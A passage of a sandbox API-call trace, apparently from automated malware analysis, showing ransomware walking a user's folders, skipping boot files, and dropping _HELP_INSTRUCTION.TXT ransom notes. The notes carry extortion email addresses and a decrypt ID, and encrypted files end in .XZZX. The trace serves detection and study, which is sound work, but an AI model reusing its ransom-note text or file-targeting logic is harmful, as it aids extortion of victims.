hFindFile=0x3cde9d8) returned 1 [0228.874] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0228.874] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0228.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0228.875] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0228.875] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0228.875] SetErrorMode (uMode=0x1) returned 0x1 [0228.875] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\_HELP_INSTRUCTION.TXT") returned 60 [0228.875] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0228.875] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0228.875] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x10c8) returned 0x0 [0228.875] RegQueryValueExW (in: hKey=0x10c8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d3908, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43d3908*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0228.875] RegCloseKey (hKey=0x10c8) returned 0x0 [0228.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0228.875] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0228.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c8 [0228.876] CloseHandle (hObject=0x10c8) returned 1 [0228.876] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0228.876] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="Contacts" [0228.876] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0228.876] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0228.876] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0228.876] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0228.876] SetErrorMode (uMode=0x1) returned 0x1 [0228.876] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0228.876] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0228.876] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0228.876] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*" [0228.876] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0228.877] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0228.877] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0228.877] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*" [0228.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="Desktop") returned 0x0 [0228.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="DESKTOP") returned 0x0 [0228.877] SetErrorMode (uMode=0x1) returned 0x1 [0228.877] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\_HELP_INSTRUCTION.TXT") returned 59 [0228.877] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0228.877] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0228.877] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x10cc) returned 0x0 [0228.877] RegQueryValueExW (in: hKey=0x10cc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d3b38, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43d3b38*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0228.877] RegCloseKey (hKey=0x10cc) returned 0x0 [0228.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0228.877] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0228.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10cc [0228.878] CloseHandle (hObject=0x10cc) returned 1 [0228.878] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0228.878] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0228.878] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0228.878] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0228.878] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0228.878] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0228.878] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0228.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0228.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0228.878] SetErrorMode (uMode=0x1) returned 0x1 [0228.878] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0228.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0228.878] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0228.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0228.878] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0228.878] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="Desktop" [0228.879] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0228.879] StrStrW (lpFirst="297441CE2F3A13CA3B4881DA31D4F812.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.879] StrStrW (lpFirst="297441CE2F3A13CA3B4881DA31D4F812.XZZX", lpSrch="ntldr") returned 0x0 [0228.879] StrStrW (lpFirst="297441CE2F3A13CA3B4881DA31D4F812.XZZX", lpSrch="NTLDR") returned 0x0 [0228.879] StrStrW (lpFirst="297441CE2F3A13CA3B4881DA31D4F812.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.879] StrStrW (lpFirst="297441CE2F3A13CA3B4881DA31D4F812.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.879] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.879] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.879] lstrcmpW (lpString1="2E75F0001166B900C846E8C014019D48.XZZX", lpString2="..") returned 1 [0228.879] lstrcmpW (lpString1="2E75F0001166B900C846E8C014019D48.XZZX", lpString2=".") returned 1 [0228.879] StrStrW (lpFirst="2E75F0001166B900C846E8C014019D48.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.879] StrStrW (lpFirst="2E75F0001166B900C846E8C014019D48.XZZX", lpSrch="ntldr") returned 0x0 [0228.879] StrStrW (lpFirst="2E75F0001166B900C846E8C014019D48.XZZX", lpSrch="NTLDR") returned 0x0 [0228.879] StrStrW (lpFirst="2E75F0001166B900C846E8C014019D48.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.879] StrStrW (lpFirst="2E75F0001166B900C846E8C014019D48.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.879] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.879] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.879] lstrcmpW (lpString1="3249DFC4336570C648854B1C3600550E.XZZX", lpString2="..") returned 1 [0228.879] lstrcmpW (lpString1="3249DFC4336570C648854B1C3600550E.XZZX", lpString2=".") returned 1 [0228.879] StrStrW (lpFirst="3249DFC4336570C648854B1C3600550E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.879] StrStrW (lpFirst="3249DFC4336570C648854B1C3600550E.XZZX", lpSrch="ntldr") returned 0x0 [0228.879] StrStrW (lpFirst="3249DFC4336570C648854B1C3600550E.XZZX", lpSrch="NTLDR") returned 0x0 [0228.879] StrStrW (lpFirst="3249DFC4336570C648854B1C3600550E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.879] StrStrW (lpFirst="3249DFC4336570C648854B1C3600550E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.879] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.879] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.879] lstrcmpW (lpString1="332EDF2812729F5E1FC79588150D83A6.XZZX", lpString2="..") returned 1 [0228.879] lstrcmpW (lpString1="332EDF2812729F5E1FC79588150D83A6.XZZX", lpString2=".") returned 1 [0228.879] StrStrW (lpFirst="332EDF2812729F5E1FC79588150D83A6.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.879] StrStrW (lpFirst="332EDF2812729F5E1FC79588150D83A6.XZZX", lpSrch="ntldr") returned 0x0 [0228.879] StrStrW (lpFirst="332EDF2812729F5E1FC79588150D83A6.XZZX", lpSrch="NTLDR") returned 0x0 [0228.879] StrStrW (lpFirst="332EDF2812729F5E1FC79588150D83A6.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.879] StrStrW (lpFirst="332EDF2812729F5E1FC79588150D83A6.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.879] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.879] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.879] lstrcmpW (lpString1="3AB0A51A1E38C5C557A2A45220D3AA0D.XZZX", lpString2="..") returned 1 [0228.879] lstrcmpW (lpString1="3AB0A51A1E38C5C557A2A45220D3AA0D.XZZX", lpString2=".") returned 1 [0228.879] StrStrW (lpFirst="3AB0A51A1E38C5C557A2A45220D3AA0D.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.880] StrStrW (lpFirst="3AB0A51A1E38C5C557A2A45220D3AA0D.XZZX", lpSrch="ntldr") returned 0x0 [0228.880] StrStrW (lpFirst="3AB0A51A1E38C5C557A2A45220D3AA0D.XZZX", lpSrch="NTLDR") returned 0x0 [0228.880] StrStrW (lpFirst="3AB0A51A1E38C5C557A2A45220D3AA0D.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.880] StrStrW (lpFirst="3AB0A51A1E38C5C557A2A45220D3AA0D.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.880] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.880] lstrcmpW (lpString1="3DAB86532684748B01DC4141291F58D3.XZZX", lpString2="..") returned 1 [0228.880] lstrcmpW (lpString1="3DAB86532684748B01DC4141291F58D3.XZZX", lpString2=".") returned 1 [0228.880] StrStrW (lpFirst="3DAB86532684748B01DC4141291F58D3.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.880] StrStrW (lpFirst="3DAB86532684748B01DC4141291F58D3.XZZX", lpSrch="ntldr") returned 0x0 [0228.880] StrStrW (lpFirst="3DAB86532684748B01DC4141291F58D3.XZZX", lpSrch="NTLDR") returned 0x0 [0228.880] StrStrW (lpFirst="3DAB86532684748B01DC4141291F58D3.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.880] StrStrW (lpFirst="3DAB86532684748B01DC4141291F58D3.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.880] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.880] lstrcmpW (lpString1="4F7E052E193A3049491669EE1BD51491.XZZX", lpString2="..") returned 1 [0228.880] lstrcmpW (lpString1="4F7E052E193A3049491669EE1BD51491.XZZX", lpString2=".") returned 1 [0228.880] StrStrW (lpFirst="4F7E052E193A3049491669EE1BD51491.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.880] StrStrW (lpFirst="4F7E052E193A3049491669EE1BD51491.XZZX", lpSrch="ntldr") returned 0x0 [0228.880] StrStrW (lpFirst="4F7E052E193A3049491669EE1BD51491.XZZX", lpSrch="NTLDR") returned 0x0 [0228.880] StrStrW (lpFirst="4F7E052E193A3049491669EE1BD51491.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.880] StrStrW (lpFirst="4F7E052E193A3049491669EE1BD51491.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.880] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.880] lstrcmpW (lpString1="5BD0D8BC3761C5798DBF782C3A2CA9C1.XZZX", lpString2="..") returned 1 [0228.880] lstrcmpW (lpString1="5BD0D8BC3761C5798DBF782C3A2CA9C1.XZZX", lpString2=".") returned 1 [0228.880] StrStrW (lpFirst="5BD0D8BC3761C5798DBF782C3A2CA9C1.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.880] StrStrW (lpFirst="5BD0D8BC3761C5798DBF782C3A2CA9C1.XZZX", lpSrch="ntldr") returned 0x0 [0228.880] StrStrW (lpFirst="5BD0D8BC3761C5798DBF782C3A2CA9C1.XZZX", lpSrch="NTLDR") returned 0x0 [0228.880] StrStrW (lpFirst="5BD0D8BC3761C5798DBF782C3A2CA9C1.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.880] StrStrW (lpFirst="5BD0D8BC3761C5798DBF782C3A2CA9C1.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.880] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.880] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.880] lstrcmpW (lpString1="7CD429BC1D46C7CC2845AFAE1FF1AC14.XZZX", lpString2="..") returned 1 [0228.880] lstrcmpW (lpString1="7CD429BC1D46C7CC2845AFAE1FF1AC14.XZZX", lpString2=".") returned 1 [0228.880] StrStrW (lpFirst="7CD429BC1D46C7CC2845AFAE1FF1AC14.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.880] StrStrW (lpFirst="7CD429BC1D46C7CC2845AFAE1FF1AC14.XZZX", lpSrch="ntldr") returned 0x0 [0228.880] StrStrW (lpFirst="7CD429BC1D46C7CC2845AFAE1FF1AC14.XZZX", lpSrch="NTLDR") returned 0x0 [0228.881] StrStrW (lpFirst="7CD429BC1D46C7CC2845AFAE1FF1AC14.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.881] StrStrW (lpFirst="7CD429BC1D46C7CC2845AFAE1FF1AC14.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.881] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.881] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.881] lstrcmpW (lpString1="7EB57C7406D4CAEAFAE6B2D2099FAF32.XZZX", lpString2="..") returned 1 [0228.881] lstrcmpW (lpString1="7EB57C7406D4CAEAFAE6B2D2099FAF32.XZZX", lpString2=".") returned 1 [0228.881] StrStrW (lpFirst="7EB57C7406D4CAEAFAE6B2D2099FAF32.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.881] StrStrW (lpFirst="7EB57C7406D4CAEAFAE6B2D2099FAF32.XZZX", lpSrch="ntldr") returned 0x0 [0228.881] StrStrW (lpFirst="7EB57C7406D4CAEAFAE6B2D2099FAF32.XZZX", lpSrch="NTLDR") returned 0x0 [0228.881] StrStrW (lpFirst="7EB57C7406D4CAEAFAE6B2D2099FAF32.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.881] StrStrW (lpFirst="7EB57C7406D4CAEAFAE6B2D2099FAF32.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.881] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.881] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.881] lstrcmpW (lpString1="831028C931A43BD1AECC4481344F2019.XZZX", lpString2="..") returned 1 [0228.881] lstrcmpW (lpString1="831028C931A43BD1AECC4481344F2019.XZZX", lpString2=".") returned 1 [0228.881] StrStrW (lpFirst="831028C931A43BD1AECC4481344F2019.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.881] StrStrW (lpFirst="831028C931A43BD1AECC4481344F2019.XZZX", lpSrch="ntldr") returned 0x0 [0228.881] StrStrW (lpFirst="831028C931A43BD1AECC4481344F2019.XZZX", lpSrch="NTLDR") returned 0x0 [0228.881] StrStrW (lpFirst="831028C931A43BD1AECC4481344F2019.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.881] StrStrW (lpFirst="831028C931A43BD1AECC4481344F2019.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.881] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.881] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.881] lstrcmpW (lpString1="85EBF6F70B9CC7A102200CB90E37ABE9.XZZX", lpString2="..") returned 1 [0228.881] lstrcmpW (lpString1="85EBF6F70B9CC7A102200CB90E37ABE9.XZZX", lpString2=".") returned 1 [0228.881] StrStrW (lpFirst="85EBF6F70B9CC7A102200CB90E37ABE9.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.881] StrStrW (lpFirst="85EBF6F70B9CC7A102200CB90E37ABE9.XZZX", lpSrch="ntldr") returned 0x0 [0228.881] StrStrW (lpFirst="85EBF6F70B9CC7A102200CB90E37ABE9.XZZX", lpSrch="NTLDR") returned 0x0 [0228.881] StrStrW (lpFirst="85EBF6F70B9CC7A102200CB90E37ABE9.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.881] StrStrW (lpFirst="85EBF6F70B9CC7A102200CB90E37ABE9.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.881] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.881] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.881] lstrcmpW (lpString1="8806259228B57EA824563E032B5062F0.XZZX", lpString2="..") returned 1 [0228.881] lstrcmpW (lpString1="8806259228B57EA824563E032B5062F0.XZZX", lpString2=".") returned 1 [0228.881] StrStrW (lpFirst="8806259228B57EA824563E032B5062F0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.881] StrStrW (lpFirst="8806259228B57EA824563E032B5062F0.XZZX", lpSrch="ntldr") returned 0x0 [0228.881] StrStrW (lpFirst="8806259228B57EA824563E032B5062F0.XZZX", lpSrch="NTLDR") returned 0x0 [0228.881] StrStrW (lpFirst="8806259228B57EA824563E032B5062F0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.881] StrStrW (lpFirst="8806259228B57EA824563E032B5062F0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.881] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0228.881] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0228.882] lstrcmpW (lpString1="992D94E80C53825AE241BB580EEE66A2.XZZX", lpString2="..") returned 1 [0228.882] lstrcmpW (lpString1="992D94E80C53825AE241BB580EEE66A2.XZZX", lpString2=".") returned 1 [0228.882] StrStrW (lpFirst="992D94E80C53825AE241BB580EEE66A2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.882] StrStrW (lpFirst="992D94E80C53825AE241BB580EEE66A2.XZZX", lpSrch="ntldr") returned 0x0 [0228.882] StrStrW (lpFirst="992D94E80C53825AE241BB580EEE66A2.XZZX", 